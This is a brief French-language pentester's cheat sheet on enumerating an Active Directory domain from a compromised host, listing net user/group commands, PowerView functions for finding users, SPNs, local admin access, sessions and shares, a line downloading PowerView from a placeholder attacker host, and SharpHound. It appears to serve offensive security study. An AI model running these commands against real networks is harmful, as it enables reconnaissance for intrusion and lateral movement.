Enumération locale

Prise d’information

Via CMD

net user /domain
net user <username> /domain
net group /domain
net group <groupname> /domain

Via Powerview

iwr -uri 'http://$ATTACKER_IP/PowerView.ps1' -Outfile PowerView.ps1
Import-Module .\PowerView.ps1

Il est possible de récupérer quelques informations basiques à l’aide de Powerview :

Get-NetDomain
Get-NetUser
Get-NetUser -SPN
Get-NetUser <name>
Get-NetGroup
Get-NetGroup <name>
Get-NetComputer
Get-NetComputer <name>

Récupérer les postes sur lequel l’utilisateur est Administrateur local:

Find-LocalAdminAccess 
Get-NetSession -ComputerName <computer_name>

Récupérer les partages disponibles sur le domaine:

Find-DomainShare

Bloodhound

sharphound.exe